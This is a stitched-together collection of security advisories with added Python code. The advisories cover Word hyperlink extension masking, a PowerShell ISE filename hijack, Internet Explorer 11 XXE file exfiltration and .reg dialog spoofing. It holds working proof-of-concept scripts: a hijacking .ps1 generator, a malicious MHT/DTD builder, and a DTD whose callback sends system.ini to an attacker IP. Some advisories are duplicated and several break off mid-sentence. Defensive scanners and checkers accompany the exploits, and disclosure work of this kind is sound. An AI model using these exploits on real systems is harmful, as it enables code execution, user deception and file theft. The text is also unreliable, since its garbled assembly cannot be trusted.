When a MS Word ".docx" File contains a hyperlink to another file, it will run the first file it finds in that directory with a valid extension, but will present to the end user an extension-less file in its Security warning dialog box without showing the extension type, if another "empty" file of the same name as the target executable exists but has no file extension.

Because the extension is suppressed it makes the file seem harmless and the file can be masked to appear as just a folder etc. This can potentially trick a user into running unexpected code, but will only work when you have an additional file of the same name with NO extension on it.

[Exploit/POC]

1) Create a directory "PoC"
2) Create a folder in the PoC directory named "Downloads Folder"
3) Create a .BAT file named "Downloads Folder.bat"; in the .BAT create some command like "start calc.exe"
4) Create an empty file named "Downloads Folder" with no file extension
5) Create the Word ".docx" file with a hyperlink pointing to "PoC/Downloads Folder/Downloads Folder"

Upon opening the link Word will give the user a vague dialog box asking if they want to open the file. However, the prompt shows an apparent folder structure and no file extension .exe, .com etc. is visible or displayed to the end user.

Click the link to open what looks to be a folder, then BOOM! the .BAT file runs instead. Of course any executable will do, .EXE etc.

[Network Access]
Local

[Severity]
High

[POC Video URL]
https://www.youtube.com/watch?v=irxkV_qGG9Y

[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program : 2019-01-25
Case officially contracted to ZDI : 2019-02-06
Vendor Disclosure : 2019-02-15 submitted to the vendor as ZDI-CAN-7949.
ZDI Response : "We have synced with the vendor and they have resolved that this case does not meet the bar for security servicing. Therefore we will proceed to close it on our end."
2019-06-14 : Public Disclosure
Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
Windows PowerShell ISE

The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell. In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface.

[Vulnerability Type]
Filename Parsing Flaw Remote Code Execution 0day

[References]
ZDI-CAN-8005

[Security Issue]
Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of PowerShell ISE, allowing potential unexpected remote code execution.

In PowerShell brackets are used to access array elements.

PS C:\> $a=1..10
PS C:\> $a[4]
5

However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file. That file must contain a single matching char value which is also found in our specially crafted filename. Requirements are both files must reside in the same directory.

Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L".

Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols. PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application.

These chars also get the job done: "$" "_" "#" "^" plus any single case insensitive letter a-z or numbers 0-9,

[Hello_World].ps1 > _.ps1

[Hello].ps1 will execute this instead => h.ps1

Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to another PS file named -.ps1 and seems to treat it sort of like a meta-character.

[pw3d].ps1 <= expected to execute
3.ps1 <= actually executed

This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code in ISE that is expected to run. However, when the user debugs the script a different script gets executed. Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss.

User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and yet ... still they get PWNED!.

Tested successfully on Win7/10

Long live user interaction! lol...

[POC Video URL]
https://www.youtube.com/watch?v=T2I_-iUPaFw

[Exploit/POC]

After opening PS files in ISE, set the execution policy so you can test without issues.

set-executionpolicy unrestricted -force

PS scripts over Network shares may get a 'RemoteSigned' security policy issue, so run the below cmd.

set-executionpolicy unrestricted -force process

Choose 'R' to run once.

The below Python script will create two .ps1 files to demonstrate the vulnerable condition. Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it... BAM! the other PS script executes!.

#PowerShell ISE 0day Xploit
#ZDI-CAN-8005
#ZDI CVSS: 7.0
#hyp3rlinx
#ApparitionSec

fname1="[HelloWorldTutoria1].ps1"   #Expected code to run is 'HelloWorld!'
fname2="1.ps1"                      #Actual code executed is calc.exe for Poc
evil_code="start calc.exe"          #Edit to suit your needs.
c=0

payload1='Write-Output "Hello World!"'
payload2=evil_code+"\n"+'Write-Output "Hello World!"'

def mk_ps_hijack_script():
    global c
    c+=1
    f=open(globals()["fname"+str(c)],"wb")
    f.write(globals()["payload"+str(c)])
    f.close()
    if c<2:
        mk_ps_hijack_script()

if __name__=="__main__":
    mk_ps_hijack_script()
    print "PowerShell ISE Xploit 0day Files Created!"
    print "Discovery by hyp3rlinx"
    print "ZDI-CAN-8005"

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
ZDI Case opened : 2019-02-06
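Both PowerShell filename advisories above (the ";"/space separator case and the ISE "[...]" wildcard case) describe conditions a defender can audit for from the file system alone. The scanner below is an added example, not the author's PoC: it flags .ps1 names that carry separators or embedded command tokens, names whose leading token shadows a sibling executable, and bracketed names for which a one-character sibling script exists. The directory it scans is a constructed temporary tree; the heuristics and finding labels are assumptions.

```python
import os
import re
import tempfile

# Patterns taken from the two advisories: separators inside a .ps1 name let
# cmd.exe or a double-click split the name into further commands; "[...]" is
# read by ISE as a wildcard pattern, so a one-character sibling script whose
# name is one of the bracketed characters runs instead (case-insensitive).
SEPARATOR_RX = re.compile(r"[;\s]")
BRACKET_RX = re.compile(r"\[([^\]]*)\]")
# Tokens that have no business inside a script *name* (heuristic, assumed).
EMBEDDED_CMD_RX = re.compile(
    r"powershell|iwr|invoke-webrequest|\s-e(?:nc(?:odedcommand)?)?\b",
    re.IGNORECASE)
# Executable types the first advisory lists as possible trojan files.
EXEC_EXTS = (".com", ".exe", ".bat", ".cpl", ".js", ".vbs", ".wsf")


def bracket_targets(stem, siblings):
    """Sibling one-character .ps1 scripts a bracketed name could resolve to."""
    hits = set()
    for m in BRACKET_RX.finditer(stem):
        for ch in set(m.group(1).lower()):
            cand = ch + ".ps1"
            if cand in siblings:
                hits.add(cand)
    return sorted(hits)


def shadow_executables(stem, siblings):
    """Sibling executables that share the part of the name before ';'/space."""
    head = SEPARATOR_RX.split(stem, maxsplit=1)[0].lower()
    return sorted(head + ext for ext in EXEC_EXTS if head + ext in siblings)


def classify(name, siblings):
    """Return finding labels for one file name; empty means nothing noteworthy."""
    findings = []
    if not name.lower().endswith(".ps1"):
        return findings
    stem = name[:-4]
    if SEPARATOR_RX.search(stem):
        findings.append("separator-in-name")
        for exe in shadow_executables(stem, siblings):
            findings.append("shadow-executable:" + exe)
    if EMBEDDED_CMD_RX.search(stem):
        findings.append("embedded-command")
    targets = bracket_targets(stem, siblings)
    if targets:
        findings.append("wildcard-hijack:" + ",".join(targets))
    return findings


def scan_dir(path):
    """Map each suspicious .ps1 name in `path` to its findings."""
    names = os.listdir(path)
    siblings = {n.lower() for n in names}
    result = {}
    for n in names:
        f = classify(n, siblings)
        if f:
            result[n] = f
    return result


# Constructed sample tree mirroring the advisories' examples (no payloads).
SAMPLE_FILES = [
    "[HelloWorldTutoria1].ps1", "1.ps1",
    "[Hello_World].ps1", "_.ps1",
    "Hello;World.ps1", "hello.exe",
    "Test;powershell -e QUJD;2.ps1",
    "normal_script.ps1",
]


def demo():
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        for n in SAMPLE_FILES:
            open(os.path.join(d, n), "w").close()  # empty placeholder files
        return scan_dir(d)


if __name__ == "__main__":
    for name, findings in sorted(demo().items()):
        print(name, "->", ", ".join(findings))
```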
[**UPDATED] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Internet Explorer v11 (latest version)

Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

[Vulnerability Type]
XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
Internet Explorer is vulnerable to an XML External Entity (XXE) attack if a user opens a specially crafted .MHT file locally. This allows remote attackers to exfiltrate local files and to conduct remote reconnaissance of locally installed program version information. For example, a request for "c:\Python27\NEWS.txt" returns the version information for that program.

Opening the malicious ".MHT" file locally launches Internet Explorer. User interactions such as duplicating the tab (Ctrl+K), or right-clicking the web page and choosing "Print Preview" or "Print", can then trigger the XXE. However, a simple call to the window.print() JavaScript function does the trick without requiring any user interaction with the web page.

Importantly, if the file is downloaded from the web inside a compressed archive and extracted with certain archive utilities, the Mark of the Web (MOTW) may not be applied as advertised.

Typically, when instantiating ActiveX objects like "Microsoft.XMLHTTP", users get a security warning bar in IE and are prompted to allow the blocked content. When opening a specially crafted .MHT file that uses malicious markup tags, the user gets no such active-content or security-bar warning.

e.g.

C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -

The first request is IE fetching the external DTD "datatears.xml" from the attacker's server; the second carries the contents of the victim's Windows "system.ini" (the "; for 16-bit app support", [386Enh], [drivers] and [mci] sections, with line breaks lost) URL-encoded in the query string.

Tested successfully in the latest Internet Explorer v11 with the latest security patches on Windows 7/10 and Server 2012 R2.

[POC/Video URL]
https://www.youtube.com/watch?v=fbLNbCjgJeY

[Exploit/POC]
PoC to exfiltrate the Windows "system.ini" file.

Note: Edit the attacker server IP in the script to suit your needs.

1) Use the script below to create the "datatears.xml" external DTD and the XXE-embedded "msie-xxe-0day.mht" MHT file.
2) python -m SimpleHTTPServer
3) Place the generated "datatears.xml" in the Python server web root.
4) Open the generated "msie-xxe-0day.mht" file and watch your files be exfiltrated.

#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx
#ApparitionSec
#Note: in this copy of the advisory every HTML/XML tag inside the two templates below was
#stripped when the text was archived; only the text between tags survives (the %sp; and
#%param1; parameter-entity references and the ]> that closes the internal DTD subset, the
#window.print() call, and the page text). ATTACKER_IP and PORT were referenced from the
#stripped SYSTEM identifiers.

ATTACKER_IP="localhost"
PORT="8000"

mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'
'http://www.w3.org/TR/html4/transitional.dtd;>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)

#External DTD served as datatears.xml (entity declarations stripped in this copy, see note above)
xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)

def mk_msie_0day_filez(f,p):
    f=open(f,"wb")
    f.write(p)
    f.close()

if __name__ == "__main__":
    mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
    mk_msie_0day_filez("datatears.xml",xml_file)
    print "Microsoft Internet Explorer XML External Entity 0day PoC."
    print "Files msie-xxe-0day.mht and datatears.xml Created!."
    print "Discovery: Hyp3rlinx / Apparition Security"

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019
Case Opened: March 28, 2019
MSRC response April 10, 2019: "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
April 10,
Microsoft Internet Explorer v11 XML External Entity Injection 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Internet Explorer v11 (latest version)

Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

[Vulnerability Type]
XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
Internet Explorer is vulnerable to an XML External Entity (XXE) attack if a user opens a specially crafted .MHT file locally. This allows remote attackers to exfiltrate local files and to conduct remote reconnaissance of locally installed program version information. For example, a request for "c:\Python27\NEWS.txt" returns the version information for that program.

Opening the malicious ".MHT" file locally launches Internet Explorer. User interactions such as duplicating the tab (Ctrl+K), or right-clicking the web page and choosing "Print Preview" or "Print", can then trigger the XXE. However, a simple call to the window.print() JavaScript function does the trick without requiring any user interaction with the web page.

Importantly, if the file is downloaded from the web inside a compressed archive and extracted with certain archive utilities, the Mark of the Web (MOTW) may not be applied as advertised.

Typically, when instantiating ActiveX objects like "Microsoft.XMLHTTP", users get a security warning bar in IE and are prompted to allow the blocked content. When opening a specially crafted .MHT file that uses malicious markup tags, the user gets no such active-content or security-bar warning.

e.g.

C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -

The first request is IE fetching the external DTD "datatears.xml" from the attacker's server; the second carries the contents of the victim's Windows "system.ini" (the "; for 16-bit app support", [386Enh], [drivers] and [mci] sections, with line breaks lost) URL-encoded in the query string.

Tested successfully in the latest Internet Explorer v11 with the latest security patches on Windows 7/10 and Server 2012 R2.

[POC/Video URL]
https://vimeo.com/329717404

[Exploit/POC]
PoC to exfiltrate the Windows "system.ini" file.

Note: Edit the attacker server IP in the script to suit your needs.

1) Use the script below to create the "datatears.xml" external DTD and the XXE-embedded "msie-xxe-0day.mht" MHT file.
2) python -m SimpleHTTPServer
3) Place the generated "datatears.xml" in the Python server web root.
4) Open the generated "msie-xxe-0day.mht" file and watch your files be exfiltrated.

#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx
#ApparitionSec
#Note: in this copy of the advisory every HTML/XML tag inside the two templates below was
#stripped when the text was archived; only the text between tags survives (the %sp; and
#%param1; parameter-entity references and the ]> that closes the internal DTD subset, the
#window.print() call, and the page text). ATTACKER_IP and PORT were referenced from the
#stripped SYSTEM identifiers.

ATTACKER_IP="localhost"
PORT="8000"

mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'
'http://www.w3.org/TR/html4/transitional.dtd;>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)

#External DTD served as datatears.xml (entity declarations stripped in this copy, see note above)
xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)

def mk_msie_0day_filez(f,p):
    f=open(f,"wb")
    f.write(p)
    f.close()

if __name__ == "__main__":
    mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
    mk_msie_0day_filez("datatears.xml",xml_file)
    print "Microsoft Internet Explorer XML External Entity 0day PoC."
    print "Files msie-xxe-0day.mht and datatears.xml Created!."
    print "Discovery: Hyp3rlinx / Apparition Security"

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019
Case Opened: March 28, 2019
MSRC response April 10, 2019: "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
April 10, 2019 : Public Di
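The exfiltration channel that both copies of the advisory above describe, as an added example in Python 3: it is not the advisory's PoC script (whose markup was lost in this copy) and not Microsoft code. An external DTD fetched as datatears.xml defines a parameter entity %sp; holding the target file and a parameter entity %param1; whose value declares a general entity with a SYSTEM URL that embeds %sp;, so that when the victim's parser resolves that entity the file travels back to the attacker as the query string of a GET. The exact entity declarations, the callback URL shape, the attacker address 192.0.2.10 and the log lines are assumptions reconstructed from what survives of the advisory. build_external_dtd() writes such a DTD; decode_exfil_from_log() is the analyst-side half, turning the SimpleHTTPServer log line back into the file text, which is what you would run over a captured attacker-side log.

```python
import re
from urllib.parse import unquote

# Python SimpleHTTPServer / http.server access-log line, in the shape the advisory prints.
LOG_RE = re.compile(r'^\S+ - - \[[^\]]+\] "GET /\?(?P<query>[^ "]*) HTTP/1\.[01]" \d{3} -')


def build_external_dtd(attacker_ip, port, target_file):
    """External DTD (served as datatears.xml) that reads target_file into %sp; and then,
    via %param1;, declares a general entity 'exfil' whose SYSTEM URL sends it back to us.
    Parameter-entity references inside an entity value are expanded in an external DTD,
    which is what lets %sp; land inside the URL.  Entity names are assumptions."""
    callback = "http://" + attacker_ip + ":" + port + "/?%sp;"
    return (
        '<!ENTITY % sp SYSTEM "' + target_file + '">\n'
        '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'' + callback + '\'>">\n'
    )


def decode_exfil_from_log(log_line):
    """File text carried in the query string of one log line, or None if the line is not
    an exfil callback (e.g. the initial GET /datatears.xml).  Line breaks do not survive
    the trip: the parser folds the file into one URL, so the INI sections run together."""
    m = LOG_RE.match(log_line)
    if not m:
        return None
    return unquote(m.group("query"))


def exfiltrated_texts(log_lines):
    """All decoded exfil payloads found in a list of log lines, in order."""
    return [t for t in (decode_exfil_from_log(line) for line in log_lines) if t is not None]


# Constructed sample: the two requests the advisory shows the attacker's server logging
# (the second one shortened to its first section).
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -',
    '127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fon HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    print(build_external_dtd("192.0.2.10", "8000", "c:\\windows\\system.ini"))
    for text in exfiltrated_texts(SAMPLE_LOG):
        print(repr(text))
```

The decoder only recovers what the parser sent: anything in the file that breaks URI syntax (a literal "#", or characters the parser refuses to put in a SYSTEM identifier) is lost or truncated before it reaches the log, which is why a captured query string should be treated as a partial copy of the file.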
Microsoft Windows .Reg File Dialog Box Message Spoofing 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry editor when backing up parts of the registry.

[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing

[CVE Reference]
N/A

[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof the default registry warning dialog box presented to an end user. This can trick unsavvy users into choosing the wrong selection in the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Windows 10), thereby hiding the fact that our attack was successful.

Normally, when a user opens a .reg file, UAC prompts first; after that they get the registry security warning dialog asking whether they "trust the source", "Are you sure you want to continue?" etc., with a choice of 'Yes' or 'No'. However, we can inject our own messages through the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control.

The registry dialog echoes back the filename plus any text we add, and allows us to terminate part of its default security warning message. We achieve this using %-encoded characters in the filename like %n or %r and %0. For example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us replace the "Are you sure you want to continue?" warning message with "Click Yes" or whatever else we like, potentially making a user think they are cancelling the registry import, as the security warning dialog box is now lying to them.

Denial of the secondary registry editor status dialog box (hiding successful attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in [filename] have been successfully added to the registry". We can deny this secondary registry editor dialog from appearing by tacking a (null) onto the end of our filename, right before the terminator, using %1 or %25, like:

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want to use a (null), use %3; it displays an Asian character instead but still prevents the secondary registry dialog box. You will have to manually refresh the registry key written to in order to see the values stored when using these dialog denial-of-service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog box; depending on the Windows OS version you will get different results.

% - can be used for obfuscation, e.g. %h%a%t%e = hate
%b creates white-space
%n makes a newline
%r makes a newline
%1 creates a (null) - important, as it prevents the second registry dialog from appearing after a successful import!
%0 - important, terminates the string
%25 (Windows 10) creates a (null) - important, as it prevents the second registry dialog from appearing after a successful import!
%3 - important, as it prevents the second registry dialog from appearing after a successful import! (but shows an Asian character)
%5 (Windows 10) duplicates the default registry dialog box message "n" times, once per %5 injected into the filename
%25 (Windows 7) duplicates the default registry dialog box message "n" times, once per %25 injected into the filename
%2525 prevents the registry editor from opening
%169 shows our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry dialog box to Asian characters etc.

Each injected character can be separated by a percent "%" sign without messing up our spoofed message; we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and the default registry messages are not displayed in the registry dialog box.

The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-
[**UPDATED] Microsoft Windows .Reg File Dialog Box Message Spoofing 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry editor when backing up parts of the registry.

[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing

[CVE Reference]
N/A

[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof the default registry warning dialog box presented to an end user. This can trick unsavvy users into choosing the wrong selection in the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Windows 10), thereby hiding the fact that our attack was successful.

Normally, when a user opens a .reg file, UAC prompts first (if the user runs as Admin); when targeting a non-privileged user we can still hijack HKCU registry settings without having to deal with UAC at all. After that they get the registry security warning dialog asking whether they "trust the source", "Are you sure you want to continue?" etc., with a choice of 'Yes' or 'No'. However, we can inject our own messages through the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control.

The registry dialog echoes back the filename plus any text we add, and allows us to terminate part of its default security warning message. We achieve this using %-encoded characters in the filename like %n or %r and %0. For example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us replace the "Are you sure you want to continue?" warning message with "Click Yes" or whatever else we like, potentially making a user think they are cancelling the registry import, as the security warning dialog box is now lying to them.

Denial of the secondary registry editor status dialog box (hiding successful attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in [filename] have been successfully added to the registry". We can deny this secondary registry editor dialog from appearing by tacking a (null) onto the end of our filename, right before the terminator, using %1 or %25, like:

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want to use a (null), use %3; it displays an Asian character instead but still prevents the secondary registry dialog box. You will have to manually refresh the registry key written to in order to see the values stored when using these dialog denial-of-service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog box; depending on the Windows OS version you will get different results.

% - can be used for obfuscation, e.g. %h%a%t%e = hate
%b creates white-space
%n makes a newline
%r makes a newline
%1 creates a (null) - important, as it prevents the second registry dialog from appearing after a successful import!
%0 - important, terminates the string
%25 (Windows 10) creates a (null) - important, as it prevents the second registry dialog from appearing after a successful import!
%3 - important, as it prevents the second registry dialog from appearing after a successful import! (but shows an Asian character)
%5 (Windows 10) duplicates the default registry dialog box message "n" times, once per %5 injected into the filename
%25 (Windows 7) duplicates the default registry dialog box message "n" times, once per %25 injected into the filename
%2525 prevents the registry editor from opening
%169 shows our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry dialog box to Asian characters etc.

Each injected character can be separated by a percent "%" sign without messing up our spoofed message; we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and the default registry messages are not displayed in the registry dialog box.

The filename "Microsoft
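A worked model of the filename rendering both copies of the .reg advisory above describe, as an added Python 3 example that is neither the author's nor Microsoft's code. It applies only the substitutions the advisory lists (%x for a letter, %b space, %n and %r newline, %1 and %25 NUL, %0 stops the text) to show what the warning dialog would echo for the advisory's sample filename, and flags such filenames the way a mail or download gateway could; it models the described behaviour, not regedit's actual parsing, and the Windows-version-specific sequences (%3, %5, %17, %169, %197, %2525) are only flagged, not rendered.

```python
import re

# Substitutions the advisory reports for the .reg warning dialog (modelled as described;
# this is not regedit's code): %<letter> -> letter, %b -> space, %n and %r -> newline,
# %1 and %25 -> NUL, %0 -> stop rendering.  The version-specific sequences are only flagged.
SIMPLE_SUBS = {"b": " ", "n": "\n", "r": "\n", "1": "\0", "25": "\0"}
TERMINATOR = "0"
ODD_SEQUENCES = ("2525", "169", "197", "17", "3", "5")
# Multi-digit sequences first, so %25 and %2525 are not read as %2 followed by digits.
TOKEN_RE = re.compile(r"%(2525|25|169|197|17|[0-9A-Za-z])")

# The filename from the advisory, used as the worked sample.
SAMPLE_FILENAME = "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"


def render_dialog_text(filename):
    """Text the warning dialog would echo for this filename, under the model above."""
    out = []
    pos = 0
    for m in TOKEN_RE.finditer(filename):
        out.append(filename[pos:m.start()])   # literal text between % sequences
        pos = m.end()
        tok = m.group(1)
        if tok == TERMINATOR:
            return "".join(out)               # nothing after %0 (the real .reg suffix) is shown
        if tok in SIMPLE_SUBS:
            out.append(SIMPLE_SUBS[tok])
        elif tok in ODD_SEQUENCES:
            out.append("\ufffd")              # version-dependent glyph; placeholder only
        else:
            out.append(tok)                   # %h%a%t%e -> hate
    out.append(filename[pos:])
    return "".join(out)


def reg_filename_findings(filename):
    """Reasons a .reg filename should be treated as a dialog-spoofing attempt (empty if none)."""
    findings = []
    if not filename.lower().endswith(".reg"):
        return findings
    tokens = [m.group(1) for m in TOKEN_RE.finditer(filename)]
    if TERMINATOR in tokens:
        findings.append("%0 truncates the default warning text")
    if any(t in ("1", "25") for t in tokens):
        findings.append("NUL injected (suppresses the post-import status dialog on Windows 10)")
    if any(t in ("n", "r") for t in tokens):
        findings.append("newline injected into the dialog text")
    if any(t.isalpha() and t not in ("b", "n", "r") for t in tokens):
        findings.append("letters %-escaped to obfuscate the filename")
    if any(t in ODD_SEQUENCES for t in tokens):
        findings.append("version-specific sequence (%3, %5, %17, %169, %197, %2525) present")
    shown = render_dialog_text(filename)
    if shown != filename:
        findings.append("displayed text differs from the actual filename: %r" % shown)
    return findings


if __name__ == "__main__":
    print(repr(render_dialog_text(SAMPLE_FILENAME)))
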